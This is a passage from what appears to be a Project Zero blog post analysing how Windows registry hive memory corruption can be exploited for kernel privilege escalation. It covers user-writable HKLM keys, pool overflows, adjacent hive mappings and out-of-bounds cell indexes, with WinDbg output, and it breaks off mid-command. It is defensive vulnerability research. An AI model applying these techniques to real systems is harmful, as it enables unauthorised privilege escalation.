accessed. Therefore, it is crucial for system security to protect actively loaded hives from being simultaneously written to. This guarantee is achieved in the CmpOpenHiveFile function through the ShareAccess argument passed to ZwCreateFile, which takes a value of 0 or at most FILE_SHARE_READ, but never FILE_SHARE_WRITE. This causes the operating system to ensure that no application can open the file for writing as long as the handle remains open. As I write these words, the research titled False File Immutability, published by Gabriel Landau in 2024, naturally comes to my mind. He effectively demonstrated that for files opened from remote network shares (e.g., via the SMB protocol), guarantees regarding their immutability may not be upheld in practice, as the local computer simply lacks physical control over it. However, the registry implementation is generally prepared for this eventuality: for hives loaded from locations other than the system partition, the HIVE_FILE_PAGES_MUST_BE_KEPT_LOCAL and VIEW_MAP_MUST_BE_KEPT_LOCAL flags are used, as discussed in blog post #6. These flags instruct the kernel to keep local copies of each memory page for such hives, never allowing them to be completely evicted and, as a result, having to be read again from remote storage. Thus, the attack vector seems to be correctly addressed. However, during my audit of the registry's memory management implementation last year, I discovered two related vulnerabilities: CVE-2024-43452 and CVE-2024-49114. The second one is particularly noteworthy because, by abusing the Cloud Filter API functionality and its "placeholder files", it was possible to arbitrarily modify active hive files in the system, including those loaded from the C:\ drive. This completely bypassed the sharing access right checks and their associated security guarantees. With this type of issue, the hive corruption exploitation techniques can be used without any actual memory corruption taking place, by simply replacing the memory in question with controlled data. I believe that vulnerabilities of this class can be a real treat for bug hunters, and they are certainly worth remembering for the future.Conclusion Dear reader, if you've made it to the end of this blog post, and especially if you've read all the posts in this series, I'd like to sincerely congratulate you on your perseverance. 🙂 Through these write ups, I hope I've managed to document as many implementation details of the registry as possible; details that might otherwise have never seen the light of day. My goal was to show how interesting and internally complex this mechanism is, and in particular, what an important role it plays in the security of Windows as a whole. Thank you for joining me on this adventure, and see you next time!

https://googleprojectzero.blogspot.com/2025/05/the-windows-registry-adventure-8-exploitation.html
The Windows Registry Adventure #8: Practical exploitation of hive memory corruption
2025-05-28T18:09:00Z | 1748455740

Posted by Mateusz Jurczyk, Google Project Zero In the previous blog post, we focused on the general security analysis of the registry and how to effectively approach finding vulnerabilities in it. Here, we will direct our attention to the exploitation of hive-based memory corruption bugs, i.e., those that allow an attacker to overwrite data within an active hive mapping in memory. This is a class of issues characteristic of the Windows registry, but universal enough that the techniques described here are applicable to 17 of my past vulnerabilities, as well as likely any similar bugs in the future. As we know, hives exhibit a very special behavior in terms of low-level memory management (how and where they are mapped in memory), handling of allocated and freed memory chunks by a custom allocator, and the nature of data stored there. All this makes exploiting this type of vulnerability especially interesting from the offensive security perspective, which is why I would like to describe it here in detail. Similar to any other type of memory corruption, the vast majority of hive memory corruption issues can be classified into two groups: spatial violations (such as buffer overflows): and temporal violations, such as use-after-free conditions: In this write up, we will aim to select the most promising vulnerability candidate and then create a step-by-step exploit for it that will elevate the privileges of a regular user in the system, from Medium IL to system-level privileges. Our target will be Windows 11, and an additional requirement will be to successfully bypass all modern security mitigations. I have previously presented on this topic at OffensiveCon 2024 with a presentation titled "Practical Exploitation of Registry Vulnerabilities in the Windows Kernel", and this blog post can be considered a supplement and expansion of the information shown there. Those deeply interested in the subject are encouraged to review the slides and recording available from that presentation.Where to start: high-level overview of potential options Let's start with a recap of some key points. As you may recall, the Windows registry cell allocator (i.e., the internal HvAllocateCell, HvReallocateCell, and HvFreeCell functions) operates in a way that is very favorable for exploitation. Firstly, it completely lacks any safeguards against memory corruption, and secondly, it has no element of randomness, making its behavior entirely predictable. Consequently, there is no need to employ any "hive spraying" or other similar techniques known from typical heap exploitation – if we manage to achieve the desired cell layout on a test machine, it will be reproducible on other computers without any additional steps. A potential exception could be carrying out attacks on global, shared hives within HKLM and HKU, as we don't know their initial state, and some randomness may arise from operations performed concurrently by other applications. Nevertheless, even this shouldn't pose a particularly significant challenge. We can safely assume that arranging the memory layout of a hive is straightforward, and if we have some memory corruption capability within it, we will eventually be able to overwrite any type of cell given some patience and experimentation. The exploitation of classic memory corruption bugs typically involves the following steps: Initial memory corruption primitive?????????Profit (in the form of arbitrary code execution, privilege escalation, etc.) The task of the exploit developer is to fill in the gaps in this list, devising the intermediate steps leading to the desired goal. There are usually several such intermediate steps because, given the current state of security and mitigations, vulnerabilities rarely lead directly from memory corruption to code execution in a single step. Instead, a strategy of progressively developing stronger and stronger primitives is employed, where the final chain might look like this, for instance: In this model, the second/third steps are achieved by finding another interesting object, arranging for it to be allocated near the overwritten buffer, and then corrupting it in such a way as to create a new primitive. However, in the case of hives, our options in this regard seem limited: we assume that we can fully control the representation of any cell in the hive, but the problem is that there is no immediately interesting data in them from an exploitation point of view. For example, the regf format does not contain any data that directly influences control flow (e.g., function pointers), nor any other addresses in virtual memory that could be overwritten in some clever way to improve the original primitive. The diagram below depicts our current situation: Does this mean that hive memory corruption is non-exploitable, and the only thing it allows for is data corruption in an isolated hive memory view? Not quite. In the following subsections, we will carefully consider various ideas of how taking control of the internal hive data can have a broader impact on the overall security of the system. Then, we will try to determine which of the available approaches is best suited for use in a real-world exploit.Intra-hive corruption Let's start by investigating whether overwriting internal hive data is as impractical as it might initially seem.Performing hive-only attacks in privileged system hives To be clear, it's not completely accurate to say that hives don't contain any data worth overwriting. If you think about it, it's quite the opposite – the registry stores a vast amount of system configuration, information about registered services, user passwords, and so on. The only issue is that all this critical data is located in specific hives, namely those mounted under HKEY_LOCAL_MACHINE, and some in HKEY_USERS (e.g., HKU\.Default, which corresponds to the private hive of the System user). To be able to perform a successful attack and elevate privileges by corrupting only regf format data (without accessing other kernel memory or achieving arbitrary code execution), two conditions must be met: The vulnerability must be triggerable solely through API/system calls and must not require binary control over the hive, as we obviously don't have that over any system hive.The target hive must contain at least one key with permissive enough access rights that allow unprivileged users to create values (KEY_SET_VALUE permission) and/or new subkeys (KEY_CREATE_SUB_KEY). Some other access rights might also be necessary, depending on the prerequisites of the specific bug. Of the two points above, the first is definitely more difficult to satisfy. Many hive memory corruption bugs result from a strange, unforeseen state in the hive structures that can only be generated "offline", starting with full control over the given file. API-only vulnerabilities seem to be relatively rare: for instance, of my 17 hive-based memory corruption cases, less than half (specifically 8 of them) could theoretically be triggered solely by operations on an existing hive. Furthermore, a closer look reveals that some of them do not meet other conditions needed to target system hives (e.g., they only affect differencing hives), or are highly impractical, e.g., require the allocation of more than 500 GB of memory, or take many hours to trigger. In reality, out of the wide range of vulnerabilities, there are really only two that would be well suited for directly attacking a system hive: CVE-2023-23420 (discussed in the "Operating on subkeys of transactionally renamed keys" section of the report) and CVE-2023-23423 (discussed in "Freeing a shallow copy of a key node with CmpFreeKeyByCell"). Regarding the second issue – the availability of writable keys – the situation is much better for the attacker. There are three reasons for this: To successfully carry out a data-only attack on a system key, we are usually not limited to one specific hive, but can choose any that suits us. Exploiting hive corruption in most, if not all, hives mounted under HKLM would enable an attacker to elevate privileges.The Windows kernel internally implements the key opening process by first doing a full path lookup in the registry tree, and only then checking the required user permissions. The access check is performed solely on the security descriptor of the specific key, without considering its ancestors. This means that setting overly permissive security settings for a key automatically makes it vulnerable to attacks, as according to this logic, it receives no additional protection from its ancestor keys, even if they have much stricter access controls.There are a large number of user-writable keys in the HKLM\SOFTWARE and HKLM\SYSTEM hives. They do not exist in HKLM\BCD00000000, HKLM\SAM, or HKLM\SECURITY, but as I mentioned above, only one such key is sufficient for successful exploitation. To find specific examples of such publicly accessible keys, it is necessary to write custom tooling. This tooling should first recursively list all existing keys within the low-level \Registry\Machine and \Registry\User paths, while operating with the highest possible privileges, ideally as the System user. This will ensure that the process can see all the keys in the registry tree – even those hidden behind restricted parents. It is not worth trying to enumerate the subkeys of \Registry\A, as any references to it are unconditionally blocked by the Windows kernel. Similarly, \Registry\WC can likely be skipped unless one is interested in attacking differencing hives used by containerized applications. Once we have a complete list of all the keys, the next step is to verify which of them are writable by unprivileged users. This can be accomplished either by reading their security descriptors (using RegGetKeySecurity) and manually checking their access rights (using AccessCheck), or by delegating this task entirely to the kernel and simply trying to open every key with the desired rights while operating with regular user privileges. In either case, we should be ultimately able to obtain a list of potential keys that can be used to corrupt a system hive. Based on my testing, there are approximately 1678 keys within HKLM that grant subkey creation rights to normal users on a current Windows 11 system. Out of these, 1660 are located in HKLM\SOFTWARE, and 18 are in HKLM\SYSTEM. Some examples include: HKLM\SOFTWARE\Microsoft\CoreShell HKLM\SOFTWARE\Microsoft\DRM HKLM\SOFTWARE\Microsoft\Input\Locales          (and some of its subkeys) HKLM\SOFTWARE\Microsoft\Input\Settings         (and some of its subkeys) HKLM\SOFTWARE\Microsoft\Shell\Oobe HKLM\SOFTWARE\Microsoft\Shell\Session HKLM\SOFTWARE\Microsoft\Tracing                (and some of its subkeys) HKLM\SOFTWARE\Microsoft\Windows\UpdateApi HKLM\SOFTWARE\Microsoft\WindowsUpdate\UX HKLM\SOFTWARE\WOW6432Node\Microsoft\DRM HKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing HKLM\SYSTEM\Software\Microsoft\TIP             (and some of its subkeys) HKLM\SYSTEM\ControlSet001\Control\Cryptography\WebSignIn\Navigation HKLM\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings HKLM\SYSTEM\ControlSet001\Control\USB\AutomaticSurpriseRemoval HKLM\SYSTEM\ControlSet001\Services\BTAGService\Parameters\Settings As we can see, there are quite a few possibilities. The second key on the list, HKLM\SOFTWARE\Microsoft\DRM, has been somewhat popular in the past, as it was previously used by James Forshaw to demonstrate two vulnerabilities he discovered in 2019–2020 (CVE-2019-0881, CVE-2020-1377). Subsequently, I also used it as a way to trigger certain behaviors related to registry virtualization (CVE-2023-21675, CVE-2023-21748, CVE-2023-35357), and as a potential avenue to fill the SOFTWARE hive to its capacity, thereby causing an OOM condition as part of exploiting another bug (CVE-2023-32019). The main advantage of this key is that it exists in all modern versions of the system (since at least Windows 7), and it grants broad rights to all users (the Everyone group, also known as World, or S-1-1-0). The other keys mentioned above also allow regular users write operations, but they often do so through other, potentially more restricted groups such as Interactive (S-1-5-4), Users (S-1-5-32-545), or Authenticated Users (S-1-5-11), which may be something to keep in mind. Apart from global system hives, I also discovered the curious case of the HKCU\Software\Microsoft\Input\TypingInsights key being present in every user's hive, which permits read and write access to all other users in the system. I reported it to Microsoft in December 2023 (link to report), but it was deemed low severity and hasn't been fixed so far. This decision is somewhat understandable, as the behavior doesn't have direct, serious consequences for system security, but it still can work as a useful exploitation technique. Since any user can open a key for writing in the user hive of any other user, they gain the ability to: Fill the entire 2 GiB space of that hive, resulting in a DoS condition (the user and their applications cannot write to HKCU) and potentially enabling exploitation of bugs related to mishandling OOM conditions within the hive.Write not just to the "TypingInsights" key in the HKCU itself, but also to any of the corresponding keys in the differencing hives overlaid on top of it. This provides an opportunity to attack applications running within app/server silos with that user's permissions.Perform hive-based memory corruption attacks not only on system hives, but also on the hives of specific users, allowing for a more lateral privilege escalation scenario. As demonstrated, even a seemingly minor weakness in the security descriptor of a single registry key can have significant consequences for system security. In summary, attacking system hives with hive memory corruption is certainly possible, but requires finding a very good vulnerability that can be triggered on existing keys, without the need to load a custom hive. This is a good starting point, but perhaps we can find a more universal technique.Abusing regf inconsistency to trigger kernel pool corruption While hive mappings in memory are isolated and self-contained to some extent, they do not exist in a vacuum. The Windows kernel allocates and manages many additional registry-related objects within the kernel pool space, as discussed in blog post #6. These objects serve as optimization through data caching, and help implement certain functionalities that cannot be achieved solely through operations on the hive space (e.g., transactions, layered keys). Some of these objects are long-lived and persist in memory as long as the hive is mounted. Other buffers are allocated and immediately freed within the same syscall, serving only as temporary data storage. The memory safety of all these objects is closely tied to the consistency of the corresponding data within the hive mapping. After the kernel meticulously verifies the hive validity in CmCheckRegistry and related functions, it assumes that the registry hive's data maintains consistency with its own structure and associated auxiliary structures. For a potential attacker, this means that hive memory corruption can be potentially escalated to some forms of pool corruption. This provides a much broader spectrum of options for exploitation, as there are a variety of pool allocations used by various parts of the kernel. In fact, I even took advantage of this behavior in my reports to Microsoft: in every case of a use-after-free on a security descriptor, I would enable Special Pool and trigger a reference to the cached copy of that descriptor on the pools through the _CM_KEY_CONTROL_BLOCK.CachedSecurity field. I did this because it is much easier to generate a reliably reproducible crash by accessing a freed allocation on the pool than when accessing a freed but still mapped cell in the hive.  However, this is certainly not the only way to cause pool memory corruption by modifying the internal data of the regf format. Another idea would be, for example, to create a very long "big data" value in the hive (over ~16 KiB in a hive with version ≥ 1.4) and then cause _CM_KEY_VALUE.DataLength to be inconsistent with the _CM_BIG_DATA.Count field, which denotes the number of 16-kilobyte chunks in the backing buffer. If we look at the implementation of the internal CmpGetValueData function, it is easy to see that it allocates a paged pool buffer based on the former value, and then copies data to it based on the latter one. Therefore, if we set _CM_KEY_VALUE.DataLength to a number less than 16344 × (_CM_BIG_DATA.Count - 1), then the next time the value's data is requested, a linear pool buffer overflow will occur. This type of primitive is promising, as it opens the door to targeting a much wider range of objects in memory than was previously possible. The next step would likely involve finding a suitable object to place immediately after the overwritten buffer (e.g., pipe attributes, as mentioned in this article from 2020), and then corrupting it to achieve a more powerful primitive like arbitrary kernel read/write. In short, such an attack would boil down to a fairly generic exploitation of pool-based memory corruption, a topic widely discussed in existing resources. We won't explore this further here, and instead encourage interested readers to investigate it on their own.Inter-hive memory corruption So far in our analysis, we have assumed that with a hive-based memory corruption bug, we can only modify data within the specific hive we are operating on. In practice, however, this is not necessarily the case, because there might be other data located in the immediate vicinity of our bin's mapping in memory. If that happens, it might be possible to seamlessly cross the boundary between the original hive and some more interesting objects at higher memory addresses using a linear buffer overflow. In the following sections, we will look at two such scenarios: one where the mapping of the attacked hive is in the user-mode space of the "Registry" process, and one where it resides in the kernel address space.Other hive mappings in the user space of the Registry process Mapping the section views of hives in the user space of the Registry process is the default behavior for the vast majority of the registry. The layout of individual mappings in memory can be easily observed from WinDbg. To do this, find the Registry process (usually the second in the system process list), switch to its context, and then issue the !vad command. An example of performing these operations is shown below. 0: kd> !process 0 0 **** NT ACTIVE PROCESS DUMP **** PROCESS ffffa58fa069f040     SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000     DirBase: 001ae002  ObjectTable: ffffe102d72678c0  HandleCount: 3077.     Image: System PROCESS ffffa58fa074a080     SessionId: none  Cid: 007c    Peb: 00000000  ParentCid: 0004     DirBase: 1025ae002  ObjectTable: ffffe102d72d1d00  HandleCount:     Image: Registry [...] 0: kd> .process ffffa58fa074a080 Implicit process is now ffffa58f`a074a080 WARNING: .cache forcedecodeuser is not enabled 0: kd> !vad VAD             Level         Start             End              Commit ffffa58fa207f740  5        152e7a20        152e7a2f               0 Mapped       READONLY           \Windows\System32\config\SAM ffffa58fa207dbc0  4        152e7a30        152e7b2f               0 Mapped       READONLY           \Windows\System32\config\DEFAULT ffffa58fa207dc60  5        152e7b30        152e7b3f               0 Mapped       READONLY           \Windows\System32\config\SECURITY ffffa58fa207d940  3        152e7b40        152e7d3f               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa207dda0  5        152e7d40        152e7f3f               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE [...] ffffa58fa207e840  5        152ec940        152ecb3f               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa207b780  3        152ecb40        152ecd3f               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa0f98ba0  5        152ecd40        152ecd4f               0 Mapped       READONLY           \EFI\Microsoft\Boot\BCD ffffa58fa3af5440  4        152ecd50        152ecd8f               0 Mapped       READONLY           \Windows\ServiceProfiles\NetworkService\NTUSER.DAT ffffa58fa3bfe9c0  5        152ecd90        152ecdcf               0 Mapped       READONLY           \Windows\ServiceProfiles\LocalService\NTUSER.DAT ffffa58fa3ca3d20  1        152ecdd0        152ece4f               0 Mapped       READONLY           \Windows\System32\config\BBI ffffa58fa2102790  6        152ece50        152ecf4f               0 Mapped       READONLY           \Users\user\NTUSER.DAT ffffa58fa4145640  5        152ecf50        152ed14f               0 Mapped       READONLY           \Windows\System32\config\DRIVERS ffffa58fa4145460  6        152ed150        152ed34f               0 Mapped       READONLY           \Windows\System32\config\DRIVERS ffffa58fa412a520  4        152ed350        152ed44f               0 Mapped       READONLY           \Windows\System32\config\DRIVERS ffffa58fa412c5a0  6        152ed450        152ed64f               0 Mapped       READONLY           \Users\user\AppData\Local\Microsoft\Windows\UsrClass.dat ffffa58fa4e8bf60  5        152ed650        152ed84f               0 Mapped       READONLY           \Windows\appcompat\Programs\Amcache.hve In the listing above, the "Start" and "End" columns show the starting and ending addresses of each mapping divided by the page size, which is 4 KiB. In practice, this means that the SAM hive is mapped at 0x152e7a20000 – 0x152e7a2ffff, the DEFAULT hive is mapped at 0x152e7a30000 – 0x152e7b2ffff, and so on. We can immediately see that all the hives are located very close to each other, with practically no gaps in between them. However, this example does not directly demonstrate whether it's possible to place, for instance, the mapping of the SOFTWARE hive directly after the mapping of an app hive loaded by a normal user. The addresses of the system hives appear to be already determined, and there isn't much space between them to inject our own data. Fortunately, hives can grow dynamically, especially when you start writing long values to them. This leads to the creation of new bins and mapping them at new addresses in the Registry process's memory. For testing purposes, I wrote a simple program that creates consecutive values of 0x3FD8 bytes within a given key. This triggers the allocation of new bins of exactly 0x4000 bytes: 0x3FD8 bytes of data plus 0x20 bytes for the _HBIN structure, 4 bytes for the cell size, and 4 bytes for padding. Next, I ran two instances of it in parallel on an app hive and HKLM\SOFTWARE, filling the former with the letter "A" and the latter with the letter "B". The result of the test was immediately visible in the memory layout: 0: kd> !vad VAD             Level         Start             End              Commit ffffa58fa67b44c0  8        15280000        152801ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa67b5b40  7        15280200        152803ff               0 Mapped       READONLY           \Users\user\Desktop\test.dat ffffa58fa67b46a0  8        15280400        152805ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa67b6540  6        15280600        152807ff               0 Mapped       READONLY           \Users\user\Desktop\test.dat ffffa58fa67b5dc0  8        15280800        152809ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa67b4560  7        15280a00        15280bff               0 Mapped       READONLY           \Users\user\Desktop\test.dat ffffa58fa67b6900  8        15280c00        15280dff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa67b5280  5        15280e00        15280fff               0 Mapped       READONLY           \Users\user\Desktop\test.dat ffffa58fa67b5e60  8        15281000        152811ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa67b7800  7        15281200        152813ff               0 Mapped       READONLY           \Users\user\Desktop\test.dat ffffa58fa67b8de0  8        15281400        152815ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa67b8840  6        15281600        152817ff               0 Mapped       READONLY           \Users\user\Desktop\test.dat ffffa58fa67b8980  8        15281800        152819ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE [...] What we have here are interleaved mappings of trusted and untrusted hives, each 2 MiB in length and tightly packed with 512 bins of 16 KiB each. Importantly, there are no gaps between the end of one mapping and the start of another, which means that it is indeed possible to use memory corruption within one hive to influence the internal representation of another. Take, for example, the boundary between the test.dat and SOFTWARE hives at address 0x15280400000. If we dump the memory area encompassing a few dozen bytes before and after this page boundary, we get the following result: 0: kd> db 0x15280400000-30 00000152`803fffd0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA 00000152`803fffe0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA 00000152`803ffff0  41 41 41 41 41 41 41 41-41 41 41 41 00 00 00 00  AAAAAAAAAAAA.... 00000152`80400000  68 62 69 6e 00 f0 bf 0c-00 40 00 00 00 00 00 00  hbin.....@...... 00000152`80400010  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................ 00000152`80400020  20 c0 ff ff 42 42 42 42-42 42 42 42 42 42 42 42   ...BBBBBBBBBBBB 00000152`80400030  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB 00000152`80400040  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB We can clearly see that the bytes belonging to both hives in question exist within a single, continuous memory area. This, in turn, means that memory corruption could indeed spread from one hive into the other. However, to successfully achieve this result, one would also need to ensure that the specific fragment of the target hive is marked as dirty. Otherwise, this memory page would be marked as PAGE_READONLY, which would lead to a system crash when attempting to write data, despite both regions being directly adjacent to each other. After successfully corrupting data in a global, system hive, the remainder of the attack would likely involve either modifying a security descriptor to grant oneself write permissions to specific keys, or directly changing configuration data to enable the execution of one's own code with administrator privileges.Attacking adjacent memory in pool-based hive mappings Although hive file views are typically mapped in the user-mode space of the Registry process (which contains nothing else but these mappings), there are a few circumstances where this data is stored directly in kernel-mode pools. These cases are as follows: All volatile hives, which have no persistent representation as regf files on disk. Examples include the virtual hive rooted at \Registry, as well as the HKLM\HARDWARE hive.The entire HKLM\SYSTEM hive, including both its stable and volatile parts.All hives that have been recently created by calling one of the NtLoadKey* syscalls on a previously non-existent file, including newly created app hives.Volatile storage space of every active hive in the system. The first point is not useful to a potential attacker because these types of hives do not grant unprivileged users write permissions. The second and third points are also quite limited, as they could only be exploited through memory corruption that doesn't require binary control over the input hive. However, the fourth point makes it possible to exploit vulnerabilities in any hive in the system, including app hives. This is because creating volatile keys does not require any special permissions compared to regular keys. Additionally, if we have a memory corruption primitive within one storage type, we can easily influence data within the other. For example, in the case of stable storage memory corruption, it is enough to craft a value for which the cell index _CM_KEY_VALUE.Data has the highest bit set, and thus points to the volatile space. From this point, we can arbitrarily modify regf structures located in that space, and directly read/write out-of-bounds pool memory by setting a sufficiently long value size (exceeding the bounds of the given bin). Such a situation is shown in the diagram below: This behavior can be further verified on a specific example. Let's consider the HKCU hive for a user logged into a Windows 11 system – it will typically have some data stored in the volatile storage due to the existence of the "HKCU\Volatile Environment" key. Let's first find the hive in WinDbg using the !reg hivelist command: 0: kd> !reg hivelist --------------------------------------------------------------------------------------------------------------------------------------------- |     HiveAddr     |Stable Length|    Stable Map    |Volatile Length|    Volatile Map    |     BaseBlock     | FileName  --------------------------------------------------------------------------------------------------------------------------------------------- [...] | ffff82828fc1a000 |      ee000  | ffff82828fc1a128 |       5000    |  ffff82828fc1a3a0  | ffff82828f8cf000  | \??\C:\Users\user\ntuser.dat [...] As can be seen, the hive has a volatile space of 0x5000 bytes (5 memory pages). Let's try to find the second page of this hive region in memory by translating its corresponding cell index: 0: kd> !reg cellindex ffff82828fc1a000 80001000 Map = ffff82828fc1a3a0 Type = 1 Table = 0 Block = 1 Offset = 0 MapTable     = ffff82828fe6a000  MapEntry     = ffff82828fe6a018  BinAddress = ffff82828f096009, BlockOffset = 0000000000000000 BlockAddress = ffff82828f096000  pcell:  ffff82828f096004 It is a kernel-mode address, as expected. We can dump its contents to verify that it indeed contains registry data: 0: kd> db ffff82828f096000 ffff8282`8f096000  68 62 69 6e 00 10 00 00-00 10 00 00 00 00 00 00  hbin............ ffff8282`8f096010  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................ ffff8282`8f096020  38 ff ff ff 73 6b 00 00-20 10 00 80 20 10 00 80  8...sk.. ... ... ffff8282`8f096030  01 00 00 00 b0 00 00 00-01 00 04 88 98 00 00 00  ................ ffff8282`8f096040  a4 00 00 00 00 00 00 00-14 00 00 00 02 00 84 00  ................ ffff8282`8f096050  05 00 00 00 00 03 24 00-3f 00 0f 00 01 05 00 00  ......$.?....... ffff8282`8f096060  00 00 00 05 15 00 00 00-dc be 84 0b 6c 21 35 39  ............l!59 ffff8282`8f096070  b9 d0 84 88 ea 03 00 00-00 03 14 00 3f 00 0f 00  ............?... Everything looks good. At the start of the page, there is a bin header, and at offset 0x20, we see the first cell corresponding to a security descriptor ('sk'). Now, let's see what the !pool command tells us about this address: 0: kd> !pool ffff82828f096000 Pool page ffff82828f096000 region is Paged pool *ffff82828f096000 : large page allocation, tag is CM16, size is 0x1000 bytes                 Pooltag CM16 : Internal Configuration manager allocations, Binary : nt!cm We are dealing with a paged pool allocation of 0x1000 bytes requested by the Configuration Manager. And what is located right behind it? 0: kd> !pool ffff82828f096000+1000 Pool page ffff82828f097000 region is Paged pool *ffff82828f097000 : large page allocation, tag is Obtb, size is 0x1000 bytes                 Pooltag Obtb : object tables via EX handle.c, Binary : nt!ob 0: kd> !pool ffff82828f096000+2000 Pool page ffff82828f098000 region is Paged pool *ffff82828f098000 : large page allocation, tag is Gpbm, size is 0x1000 bytes                 Pooltag Gpbm : GDITAG_POOL_BITMAP_BITS, Binary : win32k.sys The next two memory pages correspond to other, completely unrelated allocations on the pool: one associated with the NT Object Manager, and the other with the win32k.sys graphics driver. This clearly demonstrates that in the kernel space, areas containing volatile hive data are mixed with various other allocations used by other parts of the system. Moreover, this technique is attractive because it not only enables out-of-bound writes of controlled data, but also the ability to read this OOB data beforehand. Thanks to this, the exploit does not have to operate "blindly", but it can precisely verify whether the memory is arranged exactly as expected before proceeding with the next stage of the attack. With these kinds of capabilities, writing the rest of the exploit should be a matter of properly grooming the pool layout and finding some good candidate objects for corruption.The ultimate primitive: out-of-bounds cell indexes The situation is clearly not as hopeless as it might have seemed earlier, and there are quite a few ways to convert memory corruption in one's own hive space into taking control of other types of memory. All of them, however, have one minor flaw: they rely on prearranging a specific layout of objects in memory (e.g., hive mappings in the Registry process, or allocations on the paged pool), which means they cannot be said to be 100% stable or deterministic. The randomness of the memory layout carries the inherent risk that either the exploit simply won't work, or worse, it will crash the operating system in the process. For lack of better alternatives, these techniques would be sufficient, especially for demonstration purposes. However, I found a better method that guarantees 100% effectiveness by completely eliminating the element of randomness. I have hinted at or even directly mentioned this many times in previous blog posts in this series, and I am, of course, referring to out-of-bounds cell indexes. As a quick reminder, cell indexes are the hive's equivalent of pointers: they are 32-bit values that allow allocated cells to reference each other. The translation of cell indexes into their corresponding virtual addresses is achieved using a special 3-level structure called a cell map, which resembles a CPU page table: The C-like pseudocode of the internal HvpGetCellPaged function responsible for performing the cell map walk is presented below: _CELL_DATA *HvpGetCellPaged(_HHIVE *Hive, HCELL_INDEX Index) {   _HMAP_ENTRY *Entry = &Hive->Storage[Index >> 31].Map                             ->Directory[(Index >> 21) & 0x3FF]                             ->Table[(Index >> 12) & 0x1FF];   return (Entry->PermanentBinAddress & (~0xF)) + Entry->BlockOffset + (Index & 0xFFF) + 4; } The structures corresponding to the individual levels of the cell map are _DUAL, _HMAP_DIRECTORY, _HMAP_TABLE and _HMAP_ENTRY, and they are accessible through the _CMHIVE.Hive.Storage field. From an exploitation perspective, two facts are crucial here. First, the HvpGetCellPaged function does not perform any bounds checks on the input index. Second, for hives smaller than 2 MiB, Windows applies an additional optimization called "small dir". In that case, instead of allocating the entire Directory array of 1024 elements and only using one of them, the kernel sets the _CMHIVE.Hive.Storage[...].Map pointer to the address of the _CMHIVE.Hive.Storage[...].SmallDir field, which simulates a single-element array. In this way, the number of logical cell map levels remains the same, but the system uses one less pool allocation to store them, saving about 8 KiB of memory per hive. This behavior is shown in the screenshot below: What we have here is a hive that has a stable storage area of 0xEE000 bytes (952 KiB) and a volatile storage area of 0x5000 bytes (20 KiB). Both of these sizes are smaller than 2 MiB, and consequently, the "small dir" optimization is applied in both cases. As a result, the Map pointers (marked in orange) point directly to the SmallDir fields (marked in green). This situation is interesting because if the kernel attempts to resolve an invalid cell index with a value of 0x200000 or greater (i.e., with the "Directory index" part being non-zero) in the context of such a hive, then the first step of the cell map walk will reference the out-of-bounds Guard, FreeDisplay, etc. fields as pointers. This situation is illustrated in the diagram below: In other words, by fully controlling the 32-bit value of the cell index, we can make the translation logic jump through two pointers fetched from out-of-bounds memory, and then add a controlled 12-bit offset to the result. An additional consideration is that in the first step, we reference OOB indexes of an "array" located inside the larger _CMHIVE structure, which always has the same layout on a given Windows build. Therefore, by choosing a directory index that references a specific pointer in _CMHIVE, we can be sure that it will always work the same way on a given version of the system, regardless of any random factors. On the other hand, a small inconvenience is that the _HMAP_ENTRY structure (i.e., the last level of the cell map) has the following layout: 0: kd> dt _HMAP_ENTRY nt!_HMAP_ENTRY    +0x000 BlockOffset      : Uint8B    +0x008 PermanentBinAddress : Uint8B    +0x010 MemAlloc         : Uint4B And the final returned value is the sum of the BlockOffset and PermanentBinAddress fields. Therefore, if one of these fields contains the address we want to reference, the other must be NULL, which may slightly narrow down our options. If we were to create a graphical representation of the relationships between structures based on the pointers they contain, starting from _CMHIVE, it would look something like the following: The diagram is not necessarily complete, but it shows an overview of some objects that can be reached from _CMHIVE with a maximum of two pointer dereferences. However, it is important to remember that not every edge in this graph will be traversable in practice. This is because of two reasons: first, due the layout of the _HMAP_ENTRY structure (i.e. 0x18-byte alignment and the need for a 0x0 value being adjacent to the given pointer), and second, due to the fact that not every pointer in these objects is always initialized. For example, the _CMHIVE.RootKcb field is only valid for app hives (but not for normal hives), while _CMHIVE.CmRm is only set for standard hives, as app hives never have KTM transaction support enabled. So, the idea provides some good foundation for our exploit, but it does require additional experimentation to get every technical detail right. Moving on, the !reg cellindex command in WinDbg is perfect for testing out-of-bounds cell indexes, because it uses the exact same cell map walk logic as HvpGetCellPaged, and it doesn't perform any additional bounds checks either. So, let's stick with the HKCU hive we were working with earlier, and try to create a cell index that points back to its _CMHIVE structure. We'll use the _CMHIVE → _CM_RM → _CMHIVE path for this. The first decision we need to make is to choose the storage type for this index: stable (0) or volatile (1). In the case of HKCU, both storage types are non-empty and use the "small dir" optimization, so we can choose either one; let's say volatile. Next, we need to calculate the directory index, which will be equal to the difference between the offsets of the _CMHIVE.CmRm and _CMHIVE.Hive.Storage[1].SmallDir fields: 0: kd> dx (&((nt!_CMHIVE*)0xffff82828fc1a000)->Hive.Storage[1].SmallDir) (&((nt!_CMHIVE*)0xffff82828fc1a000)->Hive.Storage[1].SmallDir) : 0xffff82828fc1a3a0 [Type: 